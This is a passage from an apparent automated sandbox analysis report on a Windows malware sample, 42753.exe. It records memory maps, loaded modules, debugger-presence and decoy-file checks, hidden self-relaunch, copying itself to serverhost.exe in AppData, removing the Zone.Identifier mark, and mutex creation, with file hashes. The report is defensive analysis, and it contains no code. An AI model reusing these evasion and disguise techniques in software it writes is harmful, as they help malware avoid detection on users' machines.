  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xAD4
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True True False
private_0x00000000001c0000 0x001c0000 0x001d1fff Private Memory Readable, Writable True True False
private_0x00000000001e0000 0x001e0000 0x001ecfff Private Memory Readable, Writable, Executable True True False
private_0x00000000001f0000 0x001f0000 0x001fcfff Private Memory Readable, Writable True True False
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory Readable, Writable True True False
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory Readable, Writable True True False
42753.exe 0x00400000 0x00419fff Memory Mapped File Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x004dffff Private Memory Readable, Writable True True False
pagefile_0x00000000004e0000 0x004e0000 0x005a7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005b0000 0x005b0000 0x006b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006c0000 0x006c0000 0x012bffff Pagefile Backed Memory Readable True False False
private_0x00000000013b0000 0x013b0000 0x013bffff Private Memory Readable, Writable True True False
sortdefault.nls 0x013c0000 0x0168efff Memory Mapped File Readable False False False
esent.dll 0x5f9f0000 0x5fb92fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (2)
Operation Filename Additional Information Success Count
Create C:\email.doc desired_access = GENERIC_READ False 1
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe os_pid = 0xae4, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Module (59)
Operation Module Additional Information Success Count
Load USER32.dll base_address = 0x76890000 True 1
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Load KERNEL32.dll base_address = 0x76590000 True 2
Load ntdll.dll base_address = 0x772a0000 True 1
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Load winhttp.dll base_address = 0x71a10000 True 7
Load urlmon.dll base_address = 0x76f00000 True 7
Load wininet.dll base_address = 0x77040000 True 7
Get Handle c:\users\bgc6u8~1\appdata\local\temp\42753.exe base_address = 0x400000 True 1
Get Filename c:\users\bgc6u8~1\appdata\local\temp\42753.exe process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 259 True 1
Get Filename process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 260 True 1
Get Address c:\windows\system32\user32.dll function = GetMessagePos, address_out = 0x768c6703 True 1
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 True 1
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Get Address c:\windows\system32\kernel32.dll function = VirtualAlloc, address_out = 0x765e2fb6 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x765d3ea8 True 1
Get Address c:\windows\system32\kernel32.dll function = GetCommandLineA, address_out = 0x765e98ff True 1
Get Address c:\windows\system32\kernel32.dll function = LoadLibraryA, address_out = 0x765e395c True 1
Get Address c:\windows\system32\ntdll.dll function = cos, address_out = 0x772e7400 True 1
Get Address c:\windows\system32\ntdll.dll function = sin, address_out = 0x772d41c0 True 1
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
System (3)
Operation Additional Information Success Count
Get Computer Name result_out = F71GWAT True 1
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Get Info type = Windows Directory, result_out = C:\Windows True 1
Mutex (1)
Operation Additional Information Success Count
Create mutex_name = MACA73F0A True 1
Debug (499)
Operation Process Additional Information Success Count
Check for Presence c:\users\bgc6u8~1\appdata\local\temp\42753.exe True 499
Process #4: 42753.exe
(Host: 598, Network: 0)
Information Value
ID #4
File Name c:\users\bgc6u8~1\appdata\local\temp\42753.exe
Command Line "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:50, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:35
OS Process Information
Information Value
PID 0xae4
Parent PID 0xad0 (c:\users\bgc6u8~1\appdata\local\temp\42753.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xAE8
0xAEC
0xAF0
0xAF4
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True True False
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002c0000 0x002c0000 0x0037ffff Private Memory Readable, Writable True True False
private_0x0000000000380000 0x00380000 0x00391fff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x003acfff Private Memory Readable, Writable, Executable True True False
private_0x00000000003b0000 0x003b0000 0x003bcfff Private Memory Readable, Writable True True False
pagefile_0x00000000003c0000 0x003c0000 0x003c0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003e8fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x003e0000 0x003e0fff Memory Mapped File Readable False False False
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003f0000 0x003f0000 0x003f1fff Pagefile Backed Memory Readable True False False
42753.exe 0x00400000 0x00419fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x004e7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000004f0000 0x004f0000 0x005f0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000600000 0x00600000 0x00600fff Pagefile Backed Memory Readable True False False
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000620000 0x00620000 0x0121ffff Pagefile Backed Memory Readable True False False
private_0x0000000001220000 0x01220000 0x0131ffff Private Memory Readable, Writable True True False
rpcss.dll 0x01320000 0x0137bfff Memory Mapped File Readable False False False
rpcss.dll 0x01320000 0x0137bfff Memory Mapped File Readable False False False
cversions.1.db 0x01320000 0x01323fff Memory Mapped File Readable True False False
cversions.2.db 0x01320000 0x01323fff Memory Mapped File Readable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db 0x01330000 0x01355fff Memory Mapped File Readable True False False
pagefile_0x0000000001360000 0x01360000 0x01360fff Pagefile Backed Memory Readable, Writable True False False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db 0x01370000 0x0139ffff Memory Mapped File Readable True False False
cversions.2.db 0x013a0000 0x013a3fff Memory Mapped File Readable True False False
pagefile_0x00000000013b0000 0x013b0000 0x013b0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000013b0000 0x013b0000 0x013b6fff Pagefile Backed Memory Readable True False False
private_0x00000000013c0000 0x013c0000 0x013cffff Private Memory Readable, Writable True True False
sortdefault.nls 0x013d0000 0x0169efff Memory Mapped File Readable False False False
private_0x00000000016a0000 0x016a0000 0x0179ffff Private Memory Readable, Writable True True False
private_0x00000000017a0000 0x017a0000 0x0189ffff Private Memory Readable, Writable True True False
private_0x00000000018a0000 0x018a0000 0x0199ffff Private Memory Readable, Writable True True False
private_0x00000000019a0000 0x019a0000 0x01a6ffff Private Memory Readable, Writable True True False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x019a0000 0x01a05fff Memory Mapped File Readable True False False
pagefile_0x0000000001a10000 0x01a10000 0x01a11fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001a20000 0x01a20000 0x01a20fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001a30000 0x01a30000 0x01a6ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001a70000 0x01a70000 0x01b4efff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001b50000 0x01b50000 0x01f42fff Pagefile Backed Memory Readable True False False
esent.dll 0x5f9f0000 0x5fb92fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x74600000 0x746f4fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True True False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Created Files
Filename File Size Hash Values YARA Match
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 100.00 KB (102400 bytes) MD5: d6c8126371d37ffe3100755db6aa22ed, SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42, SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec False
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 92.00 KB (94208 bytes) MD5: 2b8584cab96d20ee851054f9fedef7f3, SHA1: de72320cc8fc12f2e410afa07809b620f81066dc, SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1 False
Host Behavior
File (13)
Operation Filename Additional Information Success Count
Create C:\email.doc desired_access = GENERIC_READ False 1
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Create C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Get Info C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe type = size True 1
Get Info C:\ type = file_attributes True 1
Get Info C:\Users\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ type = file_attributes True 1
Move C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe source_filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe True 1
Delete C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe:Zone.Identifier False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0xaf8, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Module (70)
Operation Module Additional Information Success Count
Load USER32.dll base_address = 0x76890000 True 1
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Load KERNEL32.dll base_address = 0x76590000 True 2
Load ntdll.dll base_address = 0x772a0000 True 1
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Load winhttp.dll base_address = 0x71a10000 True 7
Load urlmon.dll base_address = 0x76f00000 True 8
Load wininet.dll base_address = 0x77040000 True 8
Load advapi32.dll base_address = 0x764f0000 True 1
Load ole32.dll base_address = 0x77140000 True 1
Load shell32.dll base_address = 0x758a0000 True 1
Load crypt32.dll base_address = 0x755b0000 True 1
Load userenv.dll base_address = 0x74af0000 True 1
Load wtsapi32.dll base_address = 0x74180000 True 1
Get Handle c:\users\bgc6u8~1\appdata\local\temp\42753.exe base_address = 0x400000 True 1
Get Filename c:\users\bgc6u8~1\appdata\local\temp\42753.exe process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 259 True 1
Get Filename process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 260 True 2
Get Address c:\windows\system32\user32.dll function = GetMessagePos, address_out = 0x768c6703 True 1
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 True 1
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Get Address c:\windows\system32\kernel32.dll function = VirtualAlloc, address_out = 0x765e2fb6 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x765d3ea8 True 1
Get Address c:\windows\system32\kernel32.dll function = GetCommandLineA, address_out = 0x765e98ff True 1
Get Address c:\windows\system32\kernel32.dll function = LoadLibraryA, address_out = 0x765e395c True 1
Get Address c:\windows\system32\ntdll.dll function = cos, address_out = 0x772e7400 True 1
Get Address c:\windows\system32\ntdll.dll function = sin, address_out = 0x772d41c0 True 1
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Create Mapping C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Map C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, desired_access = FILE_MAP_READ True 1
Service (1)
Operation Additional Information Success Count
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
System (8)
Operation Additional Information Success Count
Get Computer Name result_out = F71GWAT True 2
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Get Time type = Ticks, time = 85270 True 1
Get Time type = Ticks, time = 86284 True 1
Get Time type = Ticks, time = 87282 True 1
Get Info type = Windows Directory, result_out = C:\Windows True 2
Mutex (4)
Operation Additional Information Success Count
Create mutex_name = MACA73F0A True 1
Create mutex_name = Global\I78B95E2E True 1
Create mutex_name = Global\M78B95E2E True 1
Release mutex_name = Global\I78B95E2E True 1
Debug (499)
Operation Process Additional Information Success Count
Check for Presence c:\users\bgc6u8~1\appdata\local\temp\42753.exe True 499
Process #5: serverhost.exe
(Host: 566, Network: 0)
Information Value
ID #5
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:54, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:31
OS Process Information
Information Value
PID 0xaf8
Parent PID 0xae4 (c:\users\bgc6u8~1\appdata\local\temp\42753.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xAFC
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True True False
